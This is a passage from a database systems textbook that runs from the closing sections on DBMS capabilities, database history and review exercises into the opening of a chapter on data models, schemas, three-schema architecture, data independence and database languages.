called impedance mismatch problem, since the data structures provided by the
DBMS were incompatible with the programming language’s data structures.
Object-oriented database systems typically offer data structure compatibility with
one or more object-oriented programming languages.

6.4 Providing Storage Structures and Search
Techniques for Efficient Query Processing

Database systems must provide capabilities for efficiently executing queries and
updates. Because the database is typically stored on disk, the DBMS must provide
specialized data structures and search techniques to speed up disk search for the
desired records. Auxiliary files called indexes are used for this purpose. Indexes are
typically based on tree data structures or hash data structures that are suitably mod-
ified for disk search. In order to process the database records needed by a particular
query, those records must be copied from disk to main memory. Therefore, the
DBMS often has a buffering or caching module that maintains parts of the data-
base in main memory buffers. In general, the operating system is responsible for

17

Databases and Database Users

disk-to-memory buffering. However, because data buffering is crucial to the DBMS
performance, most DBMSs do their own data buffering.

The query processing and optimization module of the DBMS is responsible for
choosing an efficient query execution plan for each query based on the existing stor-
age structures. The choice of which indexes to create and maintain is part of physical
database design and tuning, which is one of the responsibilities of the DBA staff.

6.5 Providing Backup and Recovery
A DBMS must provide facilities for recovering from hardware or software failures.
The backup and recovery subsystem of the DBMS is responsible for recovery. For
example, if the computer system fails in the middle of a complex update transac-
tion, the recovery subsystem is responsible for making sure that the database is
restored to the state it was in before the transaction started executing. Alternatively,
the recovery subsystem could ensure that the transaction is resumed from the point
at which it was interrupted so that its full effect is recorded in the database. Disk
backup is also necessary in case of a catastrophic disk failure.

6.6 Providing Multiple User Interfaces
Because many types of users with varying levels of technical knowledge use a data-
base, a DBMS should provide a variety of user interfaces. These include query lan-
guages for casual users, programming language interfaces for application
programmers, forms and command codes for parametric users, and menu-driven
interfaces and natural language interfaces for standalone users. Both forms-style
interfaces and menu-driven interfaces are commonly known as graphical user
interfaces (GUIs). Many specialized languages and environments exist for specify-
ing GUIs. Capabilities for providing Web GUI interfaces to a database—or Web-
enabling a database—are also quite common.

6.7 Representing Complex Relationships among Data
A database may include numerous varieties of data that are interrelated in many
ways. Consider the example shown in Figure 2. The record for ‘Brown’ in the
STUDENT file is related to four records in the GRADE_REPORT file. Similarly, each
section record is related to one course record and to a number of GRADE_REPORT
records—one for each student who completed that section. A DBMS must have the
capability to represent a variety of complex relationships among the data, to define
new relationships as they arise, and to retrieve and update related data easily and
efficiently.

6.8 Enforcing Integrity Constraints
Most database applications have certain integrity constraints that must hold for
the data. A DBMS should provide capabilities for defining and enforcing these con-

18

Databases and Database Users

straints. The simplest type of integrity constraint involves specifying a data type for
each data item. For example, in Figure 3, we specified that the value of the Class data
item within each STUDENT record must be a one digit integer and that the value of
Name must be a string of no more than 30 alphabetic characters. To restrict the
value of Class between 1 and 5 would be an additional constraint that is not shown
in the current catalog. A more complex type of constraint that frequently occurs
involves specifying that a record in one file must be related to records in other files.
For example, in Figure 2, we can specify that every section record must be related to a
course record. This is known as a referential integrity constraint. Another type of
constraint specifies uniqueness on data item values, such as every course record must
have a unique value for Course_number. This is known as a key or uniqueness con-
straint. These constraints are derived from the meaning or semantics of the data
and of the miniworld it represents. It is the responsibility of the database designers
to identify integrity constraints during database design. Some constraints can be
specified to the DBMS and automatically enforced. Other constraints may have to
be checked by update programs or at the time of data entry. For typical large appli-
cations, it is customary to call such constraints business rules.

A data item may be entered erroneously and still satisfy the specified integrity con-
straints. For example, if a student receives a grade of ‘A’ but a grade of ‘C’ is entered
in the database, the DBMS cannot discover this error automatically because ‘C’ is a
valid value for the Grade data type. Such data entry errors can only be discovered
manually (when the student receives the grade and complains) and corrected later
by updating the database. However, a grade of ‘Z’ would be rejected automatically
by the DBMS because ‘Z’ is not a valid value for the Grade data type. When we dis-
cuss each data model in subsequent chapters, we will introduce rules that pertain to
that model implicitly. For example, in the Entity-Relationship model, a relationship
must involve at least two entities. Such rules are inherent rules of the data model
and are automatically assumed to guarantee the validity of the model.

6.9 Permitting Inferencing and Actions Using Rules
Some database systems provide capabilities for defining deduction rules for
inferencing new information from the stored database facts. Such systems are called
deductive database systems. For example, there may be complex rules in the mini-
world application for determining when a student is on probation. These can be
specified declaratively as rules, which when compiled and maintained by the DBMS
can determine all students on probation. In a traditional DBMS, an explicit
procedural program code would have to be written to support such applications. But
if the miniworld rules change, it is generally more convenient to change the declared
deduction rules than to recode procedural programs. In today’s relational database
systems, it is possible to associate triggers with tables. A trigger is a form of a rule
activated by updates to the table, which results in performing some additional oper-
ations to some other tables, sending messages, and so on. More involved procedures
to enforce rules are popularly called stored procedures; they become a part of the
overall database definition and are invoked appropriately when certain conditions
are met. More powerful functionality is provided by active database systems, which

19

Databases and Database Users

provide active rules that can automatically initiate actions when certain events and
conditions occur.

6.10 Additional Implications of Using
the Database Approach

This section discusses some additional implications of using the database approach
that can benefit most organizations.

Potential for Enforcing Standards. The database approach permits the DBA to
define and enforce standards among database users in a large organization. This facil-
itates communication and cooperation among various departments, projects, and
users within the organization. Standards can be defined for names and formats of
data elements, display formats, report structures, terminology, and so on. The DBA
can enforce standards in a centralized database environment more easily than in an
environment where each user group has control of its own data files and software.

Reduced Application Development Time. A prime selling feature of the data-
base approach is that developing a new application—such as the retrieval of certain
data from the database for printing a new report—takes very little time. Designing
and implementing a large multiuser database from scratch may take more time than
writing a single specialized file application. However, once a database is up and run-
ning, substantially less time is generally required to create new applications using
DBMS facilities. Development time using a DBMS is estimated to be one-sixth to
one-fourth of that for a traditional file system.

Flexibility. It may be necessary to change the structure of a database as require-
ments change. For example, a new user group may emerge that needs information
not currently in the database. In response, it may be necessary to add a file to the
database or to extend the data elements in an existing file. Modern DBMSs allow
certain types of evolutionary changes to the structure of the database without
affecting the stored data and the existing application programs.

Availability of Up-to-Date Information. A DBMS makes the database available
to all users. As soon as one user’s update is applied to the database, all other users
can immediately see this update. This availability of up-to-date information is
essential for many transaction-processing applications, such as reservation systems
or banking databases, and it is made possible by the concurrency control and recov-
ery subsystems of a DBMS.

Economies of Scale. The DBMS approach permits consolidation of data and
applications, thus reducing the amount of wasteful overlap between activities of
data-processing personnel in different projects or departments as well as redundan-
cies among applications. This enables the whole organization to invest in more
powerful processors, storage devices, or communication gear, rather than having
each department purchase its own (lower performance) equipment. This reduces
overall costs of operation and management.

20

Databases and Database Users

7 A Brief History of Database Applications
We now give a brief historical overview of the applications that use DBMSs and how
these applications provided the impetus for new types of database systems.

7.1 Early Database Applications Using Hierarchical
and Network Systems

Many early database applications maintained records in large organizations such as
corporations, universities, hospitals, and banks. In many of these applications, there
were large numbers of records of similar structure. For example, in a university
application, similar information would be kept for each student, each course, each
grade record, and so on. There were also many types of records and many interrela-
tionships among them.

One of the main problems with early database systems was the intermixing of con-
ceptual relationships with the physical storage and placement of records on disk.
Hence, these systems did not provide sufficient data abstraction and program-data
independence capabilities. For example, the grade records of a particular student
could be physically stored next to the student record. Although this provided very
efficient access for the original queries and transactions that the database was
designed to handle, it did not provide enough flexibility to access records efficiently
when new queries and transactions were identified. In particular, new queries that
required a different storage organization for efficient processing were quite difficult
to implement efficiently. It was also laborious to reorganize the database when
changes were made to the application’s requirements.

Another shortcoming of early systems was that they provided only programming
language interfaces. This made it time-consuming and expensive to implement new
queries and transactions, since new programs had to be written, tested, and
debugged. Most of these database systems were implemented on large and expensive
mainframe computers starting in the mid-1960s and continuing through the 1970s
and 1980s. The main types of early systems were based on three main paradigms:
hierarchical systems, network model based systems, and inverted file systems.

7.2 Providing Data Abstraction and Application
Flexibility with Relational Databases

Relational databases were originally proposed to separate the physical storage of
data from its conceptual representation and to provide a mathematical foundation
for data representation and querying. The relational data model also introduced
high-level query languages that provided an alternative to programming language
interfaces, making it much faster to write new queries. Relational representation of
data somewhat resembles the example we presented in Figure 2. Relational systems
were initially targeted to the same applications as earlier systems, and provided flex-
ibility to develop new queries quickly and to reorganize the database as require-
ments changed. Hence, data abstraction and program-data independence were much
improved when compared to earlier systems.

21

Databases and Database Users

Early experimental relational systems developed in the late 1970s and the commer-
cial relational database management systems (RDBMS) introduced in the early
1980s were quite slow, since they did not use physical storage pointers or record
placement to access related data records. With the development of new storage and
indexing techniques and better query processing and optimization, their perfor-
mance improved. Eventually, relational databases became the dominant type of data-
base system for traditional database applications. Relational databases now exist on
almost all types of computers, from small personal computers to large servers.

7.3 Object-Oriented Applications and the Need
for More Complex Databases

The emergence of object-oriented programming languages in the 1980s and the
need to store and share complex, structured objects led to the development of
object-oriented databases (OODBs). Initially, OODBs were considered a competi-
tor to relational databases, since they provided more general data structures. They
also incorporated many of the useful object-oriented paradigms, such as abstract
data types, encapsulation of operations, inheritance, and object identity. However,
the complexity of the model and the lack of an early standard contributed to their
limited use. They are now mainly used in specialized applications, such as engineer-
ing design, multimedia publishing, and manufacturing systems. Despite expecta-
tions that they will make a big impact, their overall penetration into the database
products market remains under 5% today. In addition, many object-oriented con-
cepts were incorporated into the newer versions of relational DBMSs, leading to
object-relational database management systems, known as ORDBMSs.

7.4 Interchanging Data on the Web
for E-Commerce Using XML

The World Wide Web provides a large network of interconnected computers. Users
can create documents using a Web publishing language, such as HyperText Markup
Language (HTML), and store these documents on Web servers where other users
(clients) can access them. Documents can be linked through hyperlinks, which are
pointers to other documents. In the 1990s, electronic commerce (e-commerce)
emerged as a major application on the Web. It quickly became apparent that parts of
the information on e-commerce Web pages were often dynamically extracted data
from DBMSs. A variety of techniques were developed to allow the interchange of
data on the Web. Currently, eXtended Markup Language (XML) is considered to be
the primary standard for interchanging data among various types of databases and
Web pages. XML combines concepts from the models used in document systems
with database modeling concepts.

7.5 Extending Database Capabilities for New Applications
The success of database systems in traditional applications encouraged developers
of other types of applications to attempt to use them. Such applications tradition-
ally used their own specialized file and data structures. Database systems now offer

22

Databases and Database Users

extensions to better support the specialized requirements for some of these applica-
tions. The following are some examples of these applications:

■ Scientific applications that store large amounts of data resulting from scien-
tific experiments in areas such as high-energy physics, the mapping of the
human genome, and the discovery of protein structures.

■ Storage and retrieval of images, including scanned news or personal photo-
graphs, satellite photographic images, and images from medical procedures
such as x-rays and MRIs (magnetic resonance imaging).

■ Storage and retrieval of videos, such as movies, and video clips from news
or personal digital cameras.

■ Data mining applications that analyze large amounts of data searching for
the occurrences of specific patterns or relationships, and for identifying
unusual patterns in areas such as credit card usage.

■ Spatial applications that store spatial locations of data, such as weather
information, maps used in geographical information systems, and in auto-
mobile navigational systems.

■ Time series applications that store information such as economic data at
regular points in time, such as daily sales and monthly gross national prod-
uct figures.

It was quickly apparent that basic relational systems were not very suitable for many
of these applications, usually for one or more of the following reasons:

■ More complex data structures were needed for modeling the application
than the simple relational representation.

■ New data types were needed in addition to the basic numeric and character
string types.

■ New operations and query language constructs were necessary to manipu-
late the new data types.

■ New storage and indexing structures were needed for efficient searching on
the new data types.

This led DBMS developers to add functionality to their systems. Some functionality
was general purpose, such as incorporating concepts from object-oriented data-
bases into relational systems. Other functionality was special purpose, in the form
of optional modules that could be used for specific applications. For example, users
could buy a time series module to use with their relational DBMS for their time
series application.

Many large organizations use a variety of software application packages that work
closely with database back-ends. The database back-end represents one or more
databases, possibly from different vendors and using different data models, that
maintain data that is manipulated by these packages for supporting transactions,
generating reports, and answering ad-hoc queries. One of the most commonly used
systems includes Enterprise Resource Planning (ERP), which is used to consolidate
a variety of functional areas within an organization, including production, sales,

23

Databases and Database Users

distribution, marketing, finance, human resources, and so on. Another popular type
of system is Customer Relationship Management (CRM) software that spans order
processing as well as marketing and customer support functions. These applications
are Web-enabled in that internal and external users are given a variety of Web-
portal interfaces to interact with the back-end databases.

7.6 Databases versus Information Retrieval
Traditionally, database technology applies to structured and formatted data that
arises in routine applications in government, business, and industry. Database tech-
nology is heavily used in manufacturing, retail, banking, insurance, finance, and
health care industries, where structured data is collected through forms, such as
invoices or patient registration documents. An area related to database technology is
Information Retrieval (IR), which deals with books, manuscripts, and various
forms of library-based articles. Data is indexed, cataloged, and annotated using key-
words. IR is concerned with searching for material based on these keywords, and
with the many problems dealing with document processing and free-form text pro-
cessing. There has been a considerable amount of work done on searching for text
based on keywords, finding documents and ranking them based on relevance, auto-
matic text categorization, classification of text documents by topics, and so on. With
the advent of the Web and the proliferation of HTML pages running into the bil-
lions, there is a need to apply many of the IR techniques to processing data on the
Web. Data on Web pages typically contains images, text, and objects that are active
and change dynamically. Retrieval of information on the Web is a new problem that
requires techniques from databases and IR to be applied in a variety of novel com-
binations.

8 When Not to Use a DBMS
In spite of the advantages of using a DBMS, there are a few situations in which a
DBMS may involve unnecessary overhead costs that would not be incurred in tradi-
tional file processing. The overhead costs of using a DBMS are due to the following:

■ High initial investment in hardware, software, and training

■ The generality that a DBMS provides for defining and processing data

■ Overhead for providing security, concurrency control, recovery, and
integrity functions

Therefore, it may be more desirable to use regular files under the following circum-
stances:

■ Simple, well-defined database applications that are not expected to change at
all

■ Stringent, real-time requirements for some application programs that may
not be met because of DBMS overhead

24

Databases and Database Users

■ Embedded systems with limited storage capacity, where a general-purpose
DBMS would not fit

■ No multiple-user access to data

Certain industries and applications have elected not to use general-purpose
DBMSs. For example, many computer-aided design (CAD) tools used by mechani-
cal and civil engineers have proprietary file and data management software that is
geared for the internal manipulations of drawings and 3D objects. Similarly, com-
munication and switching systems designed by companies like AT&T were early
manifestations of database software that was made to run very fast with hierarchi-
cally organized data for quick access and routing of calls. Similarly, GIS implemen-
tations often implement their own data organization schemes for efficiently
implementing functions related to processing maps, physical contours, lines, poly-
gons, and so on. General-purpose DBMSs are inadequate for their purpose.

9 Summary
In this chapter we defined a database as a collection of related data, where data
means recorded facts. A typical database represents some aspect of the real world
and is used for specific purposes by one or more groups of users. A DBMS is a gen-
eralized software package for implementing and maintaining a computerized data-
base. The database and software together form a database system. We identified
several characteristics that distinguish the database approach from traditional file-
processing applications, and we discussed the main categories of database users, or
the actors on the scene. We noted that in addition to database users, there are several
categories of support personnel, or workers behind the scene, in a database environ-
ment.

We presented a list of capabilities that should be provided by the DBMS software to
the DBA, database designers, and end users to help them design, administer, and use
a database. Then we gave a brief historical perspective on the evolution of database
applications. We pointed out the marriage of database technology with information
retrieval technology, which will play an important role due to the popularity of the
Web. Finally, we discussed the overhead costs of using a DBMS and discussed some
situations in which it may not be advantageous to use one.

Review Questions
1. Define the following terms: data, database, DBMS, database system, database

catalog, program-data independence, user view, DBA, end user, canned trans-
action, deductive database system, persistent object, meta-data, and
transaction-processing application.

2. What four main types of actions involve databases? Briefly discuss each.

3. Discuss the main characteristics of the database approach and how it differs
from traditional file systems.

25

Databases and Database Users

4. What are the responsibilities of the DBA and the database designers?

5. What are the different types of database end users? Discuss the main activi-
ties of each.

6. Discuss the capabilities that should be provided by a DBMS.

7. Discuss the differences between database systems and information retrieval
systems.

Exercises
8. Identify some informal queries and update operations that you would expect

to apply to the database shown in Figure 2.

9. What is the difference between controlled and uncontrolled redundancy?
Illustrate with examples.

10. Specify all the relationships among the records of the database shown in
Figure 2.

11. Give some additional views that may be needed by other user groups for the
database shown in Figure 2.

12. Cite some examples of integrity constraints that you think can apply to the
database shown in Figure 2.

13. Give examples of systems in which it may make sense to use traditional file
processing instead of a database approach.

14. Consider Figure 2.

a. If the name of the ‘CS’ (Computer Science) Department changes to
‘CSSE’ (Computer Science and Software Engineering) Department and
the corresponding prefix for the course number also changes, identify the
columns in the database that would need to be updated.

b. Can you restructure the columns in the COURSE, SECTION, and
PREREQUISITE tables so that only one column will need to be updated?

Selected Bibliography
The October 1991 issue of Communications of the ACM and Kim (1995) include
several articles describing next-generation DBMSs; many of the database features
discussed in the former are now commercially available. The March 1976 issue of
ACM Computing Surveys offers an early introduction to database systems and may
provide a historical perspective for the interested reader.

26

Database System Concepts
and Architecture

The architecture of DBMS database management sys-tem packages has evolved from the early monolithic
systems, where the whole DBMS software package was one tightly integrated system,
to the modern DBMS packages that are modular in design, with a client/server sys-
tem architecture. This evolution mirrors the trends in computing, where large cen-
tralized mainframe computers are being replaced by hundreds of distributed
workstations and personal computers connected via communications networks to
various types of server machines—Web servers, database servers, file servers, applica-
tion servers, and so on.

In a basic client/server DBMS architecture, the system functionality is distributed
between two types of modules.1 A client module is typically designed so that it will
run on a user workstation or personal computer. Typically, application programs
and user interfaces that access the database run in the client module. Hence, the
client module handles user interaction and provides the user-friendly interfaces
such as forms- or menu-based GUIs (graphical user interfaces). The other kind of
module, called a server module, typically handles data storage, access, search, and
other functions. We discuss client/server architectures in more detail in Section 5.
First, we must study more basic concepts that will give us a better understanding of
modern database architectures.

In this chapter we present the terminology and basic concepts. Section 1 discusses
data models and defines the concepts of schemas and instances, which are funda-
mental to the study of database systems. Then, we discuss the three-schema DBMS
architecture and data independence in Section 2; this provides a user’s perspective
on what a DBMS is supposed to do. In Section 3 we describe the types of interfaces
and languages that are typically provided by a DBMS. Section 4 discusses the data-
base system software environment. Section 5 gives an overview of various types of

1As we shall see in Section 5, there are variations on this simple two-tier client/server architecture.

From Chapter 2 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.

27

Database System Concepts and Architecture

client/server architectures. Finally, Section 6 presents a classification of the types of
DBMS packages. Section 7 summarizes the chapter.

The material in Sections 4 through 6 provides more detailed concepts that may be
considered as supplementary to the basic introductory material.

1 Data Models, Schemas, and Instances
One fundamental characteristic of the database approach is that it provides some
level of data abstraction. Data abstraction generally refers to the suppression of
details of data organization and storage, and the highlighting of the essential fea-
tures for an improved understanding of data. One of the main characteristics of the
database approach is to support data abstraction so that different users can perceive
data at their preferred level of detail. A data model—a collection of concepts that
can be used to describe the structure of a database—provides the necessary means
to achieve this abstraction.2 By structure of a database we mean the data types, rela-
tionships, and constraints that apply to the data. Most data models also include a set
of basic operations for specifying retrievals and updates on the database.

In addition to the basic operations provided by the data model, it is becoming more
common to include concepts in the data model to specify the dynamic aspect or
behavior of a database application. This allows the database designer to specify a set
of valid user-defined operations that are allowed on the database objects.3 An exam-
ple of a user-defined operation could be COMPUTE_GPA, which can be applied to a
STUDENT object. On the other hand, generic operations to insert, delete, modify, or
retrieve any kind of object are often included in the basic data model operations.
Concepts to specify behavior are fundamental to object-oriented data models but
are also being incorporated in more traditional data models. For example, object-
relational models extend the basic relational model to include such concepts,
among others. In the basic relational data model, there is a provision to attach
behavior to the relations in the form of persistent stored modules, popularly known
as stored procedures.

1.1 Categories of Data Models
Many data models have been proposed, which we can categorize according to the
types of concepts they use to describe the database structure. High-level or
conceptual data models provide concepts that are close to the way many users per-
ceive data, whereas low-level or physical data models provide concepts that
describe the details of how data is stored on the computer storage media, typically

2Sometimes the word model is used to denote a specific database description, or schema—for example,
the marketing data model. We will not use this interpretation.
3The inclusion of concepts to describe behavior reflects a trend whereby database design and software
design activities are increasingly being combined into a single activity. Traditionally, specifying behavior is
associated with software design.

28

Database System Concepts and Architecture

magnetic disks. Concepts provided by low-level data models are generally meant for
computer specialists, not for end users. Between these two extremes is a class of
representational (or implementation) data models,4 which provide concepts that
may be easily understood by end users but that are not too far removed from the
way data is organized in computer storage. Representational data models hide many
details of data storage on disk but can be implemented on a computer system
directly.

Conceptual data models use concepts such as entities, attributes, and relationships.
An entity represents a real-world object or concept, such as an employee or a project
from the miniworld that is described in the database. An attribute represents some
property of interest that further describes an entity, such as the employee’s name or
salary. A relationship among two or more entities represents an association among
the entities, for example, a works-on relationship between an employee and a proj-
ect. The Entity-Relationship model is a popular high-level conceptual data model,
and there are additional abstractions used for advanced modeling, such as general-
ization, specialization, and categories (union types).

Representational or implementation data models are the models used most fre-
quently in traditional commercial DBMSs. These include the widely used relational
data model, as well as the so-called legacy data models—the network and
hierarchical models—that have been widely used in the past. The SQL language
set the standard for relational databases. Representational data models represent
data by using record structures and hence are sometimes called record-based data
models.

We can regard the object data model as an example of a new family of higher-level
implementation data models that are closer to conceptual data models. A standard
for object databases called the ODMG object model has been proposed by the
Object Data Management Group (ODMG). Object data models are also frequently
utilized as high-level conceptual models, particularly in the software engineering
domain.

Physical data models describe how data is stored as files in the computer by repre-
senting information such as record formats, record orderings, and access paths. An
access path is a structure that makes the search for particular database records effi-
cient. An index is an example of an access path that allows direct access to data
using an index term or a keyword. It may be organized in a linear, hierarchical (tree-
structured), or some other fashion.

4The term implementation data model is not a standard term; we have introduced it to refer to the avail-
able data models in commercial database systems.

29

Database System Concepts and Architecture

1.2 Schemas, Instances, and Database State
In any data model, it is important to distinguish between the description of the data-
base and the database itself. The description of a database is called the database
schema, which is specified during database design and is not expected to change
frequently.5 Most data models have certain conventions for displaying schemas as
diagrams.6 A displayed schema is called a schema diagram. Figure 1 shows a
schema diagram for the database shown in Figure A.1 (at the end of this chapter in
Appendix: Figure); the diagram displays the structure of each record type but not
the actual instances of records. We call each object in the schema—such as STU-
DENT or COURSE—a schema construct.

A schema diagram displays only some aspects of a schema, such as the names of
record types and data items, and some types of constraints. Other aspects are not
specified in the schema diagram; for example, Figure 1 shows neither the data type
of each data item, nor the relationships among the various files. Many types of con-
straints are not represented in schema diagrams. A constraint such as students
majoring in computer science must take CS1310 before the end of their sophomore year
is quite difficult to represent diagrammatically.

The actual data in a database may change quite frequently. For example, the data-
base shown in Figure A.1 changes every time we add a new student or enter a new
grade. The data in the database at a particular moment in time is called a database

Section_identifier SemesterCourse_number InstructorYear

SECTION

Course_name Course_number Credit_hours Department

COURSE

Name Student_number Class Major

STUDENT

Course_number Prerequisite_number
PREREQUISITE

Student_number GradeSection_identifier

GRADE_REPORT

Figure 1
Schema diagram for the
database in Figure A.1.

5Schema changes are usually needed as the requirements of the database applications change. Newer
database systems include operations for allowing schema changes, although the schema change
process is more involved than simple database updates.
6It is customary in database parlance to use schemas as the plural for schema, even though schemata is
the proper plural form. The word scheme is also sometimes used to refer to a schema.

30

Database System Concepts and Architecture

state or snapshot. It is also called the current set of occurrences or instances in the
database. In a given database state, each schema construct has its own current set of
instances; for example, the STUDENT construct will contain the set of individual
student entities (records) as its instances. Many database states can be constructed
to correspond to a particular database schema. Every time we insert or delete a
record or change the value of a data item in a record, we change one state of the
database into another state.

The distinction between database schema and database state is very important.
When we define a new database, we specify its database schema only to the DBMS.
At this point, the corresponding database state is the empty state with no data. We
get the initial state of the database when the database is first populated or loaded
with the initial data. From then on, every time an update operation is applied to the
database, we get another database state. At any point in time, the database has a
current state.7 The DBMS is partly responsible for ensuring that every state of the
database is a valid state—that is, a state that satisfies the structure and constraints
specified in the schema. Hence, specifying a correct schema to the DBMS is
extremely important and the schema must be designed with utmost care. The
DBMS stores the descriptions of the schema constructs and constraints—also called
the meta-data—in the DBMS catalog so that DBMS software can refer to the
schema whenever it needs to. The schema is sometimes called the intension, and a
database state is called an extension of the schema.

Although, as mentioned earlier, the schema is not supposed to change frequently, it
is not uncommon that changes occasionally need to be applied to the schema as the
application requirements change. For example, we may decide that another data
item needs to be stored for each record in a file, such as adding the Date_of_birth to
the STUDENT schema in Figure 1. This is known as schema evolution. Most mod-
ern DBMSs include some operations for schema evolution that can be applied while
the database is operational.

2 Three-Schema Architecture
and Data Independence

Three of the four important characteristics of the database approach, are (1) use of
a catalog to store the database description (schema) so as to make it self-describing,
(2) insulation of programs and data (program-data and program-operation inde-
pendence), and (3) support of multiple user views. In this section we specify an
architecture for database systems, called the three-schema architecture,8 that was
proposed to help achieve and visualize these characteristics. Then we discuss the
concept of data independence further.

7The current state is also called the current snapshot of the database. It has also been called a database
instance, but we prefer to use the term instance to refer to individual records.
8This is also known as the ANSI/SPARC architecture, after the committee that proposed it (Tsichritzis
and Klug 1978).

31

Database System Concepts and Architecture

External
View

Conceptual Schema

Internal Schema

Stored Database

External
View

Internal Level

Conceptual/Internal
Mapping

Conceptual Level

External/Conceptual
Mapping

External Level

End Users

. . .

Figure 2
The three-schema
architecture.

2.1 The Three-Schema Architecture
The goal of the three-schema architecture, illustrated in Figure 2, is to separate the
user applications from the physical database. In this architecture, schemas can be
defined at the following three levels:

1. The internal level has an internal schema, which describes the physical stor-
age structure of the database. The internal schema uses a physical data model
and describes the complete details of data storage and access paths for the
database.

2. The conceptual level has a conceptual schema, which describes the struc-
ture of the whole database for a community of users. The conceptual schema
hides the details of physical storage structures and concentrates on describ-
ing entities, data types, relationships, user operations, and constraints.
Usually, a representational data model is used to describe the conceptual
schema when a database system is implemented. This implementation con-
ceptual schema is often based on a conceptual schema design in a high-level
data model.

3. The external or view level includes a number of external schemas or user
views. Each external schema describes the part of the database that a partic-
ular user group is interested in and hides the rest of the database from that
user group. As in the previous level, each external schema is typically imple-
mented using a representational data model, possibly based on an external
schema design in a high-level data model.

32

Database System Concepts and Architecture

The three-schema architecture is a convenient tool with which the user can visualize
the schema levels in a database system. Most DBMSs do not separate the three levels
completely and explicitly, but support the three-schema architecture to some extent.
Some older DBMSs may include physical-level details in the conceptual schema.
The three-level ANSI architecture has an important place in database technology
development because it clearly separates the users’ external level, the database’s con-
ceptual level, and the internal storage level for designing a database. It is very much
applicable in the design of DBMSs, even today. In most DBMSs that support user
views, external schemas are specified in the same data model that describes the
conceptual-level information (for example, a relational DBMS like Oracle uses SQL
for this). Some DBMSs allow different data models to be used at the conceptual and
external levels. An example is Universal Data Base (UDB), a DBMS from IBM,
which uses the relational model to describe the conceptual schema, but may use an
object-oriented model to describe an external schema.

Notice that the three schemas are only descriptions of data; the stored data that
actually exists is at the physical level only. In a DBMS based on the three-schema
architecture, each user group refers to its own external schema. Hence, the DBMS
must transform a request specified on an external schema into a request against the
conceptual schema, and then into a request on the internal schema for processing
over the stored database. If the request is a database retrieval, the data extracted
from the stored database must be reformatted to match the user’s external view. The
processes of transforming requests and results between levels are called mappings.
These mappings may be time-consuming, so some DBMSs—especially those that
are meant to support small databases—do not support external views. Even in such
systems, however, a certain amount of mapping is necessary to transform requests
between the conceptual and internal levels.

2.2 Data Independence
The three-schema architecture can be used to further explain the concept of data
independence, which can be defined as the capacity to change the schema at one
level of a database system without having to change the schema at the next higher
level. We can define two types of data independence:

1. Logical data independence is the capacity to change the conceptual schema
without having to change external schemas or application programs. We
may change the conceptual schema to expand the database (by adding a
record type or data item), to change constraints, or to reduce the database
(by removing a record type or data item). In the last case, external schemas
that refer only to the remaining data should not be affected. Only the view
definition and the mappings need to be changed in a DBMS that supports
logical data independence. After the conceptual schema undergoes a logical
reorganization, application programs that reference the external schema
constructs must work as before. Changes to constraints can be applied to the

33

Database System Concepts and Architecture

conceptual schema without affecting the external schemas or application
programs.

2. Physical data independence is the capacity to change the internal schema
without having to change the conceptual schema. Hence, the external
schemas need not be changed as well. Changes to the internal schema may be
needed because some physical files were reorganized—for example, by creat-
ing additional access structures—to improve the performance of retrieval or
update. If the same data as before remains in the database, we should not
have to change the conceptual schema. For example, providing an access
path to improve retrieval speed of section records (Figure A.1) by semester
and year should not require a query such as list all sections offered in fall 2008
to be changed, although the query would be executed more efficiently by the
DBMS by utilizing the new access path.

Generally, physical data independence exists in most databases and file environ-
ments where physical details such as the exact location of data on disk, and hard-
ware details of storage encoding, placement, compression, splitting, merging of
records, and so on are hidden from the user. Applications remain unaware of these
details. On the other hand, logical data independence is harder to achieve because it
allows structural and constraint changes without affecting application programs—a
much stricter requirement.

Whenever we have a multiple-level DBMS, its catalog must be expanded to include
information on how to map requests and data among the various levels. The DBMS
uses additional software to accomplish these mappings by referring to the mapping
information in the catalog. Data independence occurs because when the schema is
changed at some level, the schema at the next higher level remains unchanged; only
the mapping between the two levels is changed. Hence, application programs refer-
ring to the higher-level schema need not be changed.

The three-schema architecture can make it easier to achieve true data indepen-
dence, both physical and logical. However, the two levels of mappings create an
overhead during compilation or execution of a query or program, leading to ineffi-
ciencies in the DBMS. Because of this, few DBMSs have implemented the full three-
schema architecture.

3 Database Languages and Interfaces
The DBMS must provide appropriate languages and interfaces for each category of
users. In this section we discuss the types of languages and interfaces provided by a
DBMS and the user categories targeted by each interface.

3.1 DBMS Languages
Once the design of a database is completed and a DBMS is chosen to implement the
database, the first step is to specify conceptual and internal schemas for the database

34

Database System Concepts and Architecture

and any mappings between the two. In many DBMSs where no strict separation of
levels is maintained, one language, called the data definition language (DDL), is
used by the DBA and by database designers to define both schemas. The DBMS will
have a DDL compiler whose function is to process DDL statements in order to iden-
tify descriptions of the schema constructs and to store the schema description in the
DBMS catalog.

In DBMSs where a clear separation is maintained between the conceptual and inter-
nal levels, the DDL is used to specify the conceptual schema only. Another language,
the storage definition language (SDL), is used to specify the internal schema. The
mappings between the two schemas may be specified in either one of these lan-
guages. In most relational DBMSs today, there is no specific language that performs
the role of SDL. Instead, the internal schema is specified by a combination of func-
tions, parameters, and specifications related to storage. These permit the DBA staff
to control indexing choices and mapping of data to storage. For a true three-schema
architecture, we would need a third language, the view definition language (VDL),
to specify user views and their mappings to the conceptual schema, but in most
DBMSs the DDL is used to define both conceptual and external schemas. In relational
DBMSs, SQL is used in the role of VDL to define user or application views as results
of predefined queries.

Once the database schemas are compiled and the database is populated with data,
users must have some means to manipulate the database. Typical manipulations
include retrieval, insertion, deletion, and modification of the data. The DBMS pro-
vides a set of operations or a language called the data manipulation language
(DML) for these purposes.

In current DBMSs, the preceding types of languages are usually not considered dis-
tinct languages; rather, a comprehensive integrated language is used that includes
constructs for conceptual schema definition, view definition, and data manipula-
tion. Storage definition is typically kept separate, since it is used for defining physi-
cal storage structures to fine-tune the performance of the database system, which is
usually done by the DBA staff. A typical example of a comprehensive database lan-
guage is the SQL relational database language, which represents a combination of
DDL, VDL, and DML, as well as statements for constraint specification, schema
evolution, and other features. The SDL was a component in early versions of SQL
but has been removed from the language to keep it at the conceptual and external
levels only.

There are two main types of DMLs. A high-level or nonprocedural DML can be
used on its own to specify complex database operations concisely. Many DBMSs
allow high-level DML statements either to be entered interactively from a display
monitor or terminal or to be embedded in a general-purpose programming lan-
guage. In the latter case, DML statements must be identified within the program so
that they can be extracted by a precompiler and processed by the DBMS. A low-
level or procedural DML must be embedded in a general-purpose programming
language. This type of DML typically retrieves individual records or objects from
